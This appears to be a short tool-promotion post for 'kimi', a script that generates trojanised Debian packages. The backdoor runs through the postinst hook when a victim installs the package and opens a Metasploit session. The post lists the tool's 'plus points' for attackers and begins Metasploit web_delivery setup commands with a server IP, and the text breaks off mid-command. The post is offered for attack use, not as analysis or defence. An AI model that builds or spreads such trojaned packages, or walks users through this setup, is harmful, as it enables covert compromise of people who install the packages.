Malicious Debian Package Generator: kimi
Malicious Debian Package generator Script to generate malicious debian packages (debain trojans). Kimi is a script which generates Malicious debian package for metasploit which consists of bash file. the bash file is deployed into “/usr/local/bin/” directory. Backdoor gets executed just when victim tries to install deb package due to postinst file Bash file injects and also acts like some system command which when executed by victim and attacker hits with session. Malicious Debian Package Generator: kimi Plus Points : Fully indiependent. Means user no need to install any debian package creator Can be integrated with any payload generator easily due to engagements of arguemt Kimi basically depends upon web_delivery module and every thing is automated. all the attacker needs is to do following settings : Setting up Web_Delivery in msf : msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set srvhost 192.168.0.102 srvhost => 192....